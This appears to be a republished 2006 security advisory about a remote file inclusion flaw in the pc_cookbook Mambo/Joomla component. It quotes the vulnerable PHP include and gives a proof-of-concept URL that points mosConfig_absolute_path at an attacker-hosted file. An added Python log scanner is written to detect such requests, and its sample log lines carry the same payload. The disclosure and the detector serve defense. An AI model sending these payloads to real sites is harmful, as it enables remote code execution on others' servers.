pc_cookbook Mambo/Joomla Component <= v0.3 Remote File Include Vulnerabilities
CVE : N/A
Category : CWE-Other
Price : $500
Severity : High
Author : Unknown
Risk : High
Exploitation Type : Remote
Date : 2006-07-25
CPE : cpe:cpe:/a:mambo:pc_cookbook:0.3
PURL : pkg:https://exploitalert.com/view-details/pc-cookbook-mambo-joomla-component-v0-3-remote-file-include-vulnerabilities
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006070066 Below is a copy:
ECHO.OR.ID
ECHO_ADV_37$2006
------------------------------------------------------------------------
[ECHO_ADV_37$2006] pc_cookbook Mambo/Joomla Component <= v0.3 Remote File Include Vulnerabilities
------------------------------------------------------------------------
Author : Ahmad Maulana a.k.a Matdhule
Date : July 10th 2006
Location : Indonesia, Jakarta
Web : http://advisories.echo.or.id/adv/adv37-matdhule-2006.txt
Critical Lvl : Highly critical
Impact : System access
Where : From Remote
------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
pc_cookbook Component
Application : pc_cookbook Component
version : 0.3
URL : http://www.dianthos.net & http://www.fisheye.gr/koyansblog
------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~~~
In the folder com_pccookbook we found a vulnerable script, pccookbook.php.
-----------------------pccookbook.php----------------------
....
<?php
//pc_cookbook Component//
/**
* Content code
* @package hello_world
* Original @Copyright (C) 2005 Robert Prince
* @Copyright (C) 2005 Konstantinos (koyan) Kokkorogiannis
* @ All rights reserved
* @ pc_cookbook is Free Software
* @ Released under GNU/GPL License : http://www.gnu.org/copyleft/gpl.html
* @version koyans 0.3
* @link http://www.dianthos.net & http://www.fisheye.gr/koyansblog
**/
global $mosConfig_absolute_path;
global $mosConfig_live_site;
// include language file, or default to english
if (file_exists ($mosConfig_absolute_path . '/components/com_pccookbook/languages/' . $mosConfig_lang . '.php')) {
    include_once ($mosConfig_absolute_path . '/components/com_pccookbook/languages/' . $mosConfig_lang . '.php');
} else {
    include_once ($mosConfig_absolute_path . '/components/com_pccookbook/languages/english.php');
} // end if
?>
...
----------------------------------------------------------
The variable $mosConfig_absolute_path is not properly sanitized. When register_globals=on and allow_url_fopen=on, an attacker can exploit this vulnerability with a simple PHP injection script.
Proof Of Concept:
~~~~~~~~~~~~~~~~
http://[target]/[path]/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://attacker.com/evil.txt?
Solution:
~~~~~~~~
Sanitize the variable $mosConfig_absolute_path in pccookbook.php.
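
For defenders reviewing web server logs, the request pattern described in this advisory can be flagged as shown below. This is an added example, not code from the advisory or the component; it flags any request that supplies a mosConfig_* parameter (a generalization beyond pc_cookbook), and the log lines, addresses and host names are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request field of an Apache/Nginx combined-format access-log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Values that would make include_once() pull a remote file via allow_url_fopen.
REMOTE_RE = re.compile(r"\s*(?:https?|ftps?)://", re.I)


def classify(log_line):
    """Return None, 'suspicious' or 'remote-include' for one log line."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    verdict = None
    query = urlsplit(m.group(1)).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        # mosConfig_* are server-side settings; a client has no reason to
        # send them, so any occurrence is a register_globals probe.
        if not name.lower().startswith("mosconfig_"):
            continue
        verdict = "suspicious"
        # parse_qsl decoded once; decode again to catch double encoding.
        if REMOTE_RE.match(unquote(value)):
            return "remote-include"
    return verdict


def scan(lines):
    """Return (client, verdict) for every flagged line."""
    hits = []
    for line in lines:
        verdict = classify(line)
        if verdict:
            hits.append((line.split(" ", 1)[0], verdict))
    return hits


# Constructed sample entries (documentation addresses, hypothetical hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Jul/2006:10:00:01 +0000] "GET /index.php?option=com_pccookbook&Itemid=5 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [25/Jul/2006:10:02:13 +0000] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://files.example/x.txt? HTTP/1.0" 200 312',
    '198.51.100.7 - - [25/Jul/2006:10:02:15 +0000] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http%253A%252F%252Ffiles.example%252Fx.txt HTTP/1.0" 200 312',
    '203.0.113.4 - - [25/Jul/2006:10:05:40 +0000] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=/tmp HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for client, verdict in scan(SAMPLE_LOG):
        print(client, verdict)
```

A "suspicious" hit with a local path still deserves review, since it shows a client testing whether register_globals lets it set the variable.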
------------------------------------------------------------------------
Shoutz:
~~~~~~
~ solpot a.k.a chris, J4mbi H4ck3r for the hacking lesson :)
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous
~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama
~ newbie_hacker (at) yahoogroups (dot) com, jasakom_perjuangan (at) yahoogroups (dot) com
~ #mardongan #jambihackerlink #e-c-h-o @irc.dal.net
------------------------------------------------------------------------
Contact:
~~~~~~~
matdhule[at]gmail[dot]com
-------------------------------- [ EOF ]----------------------------------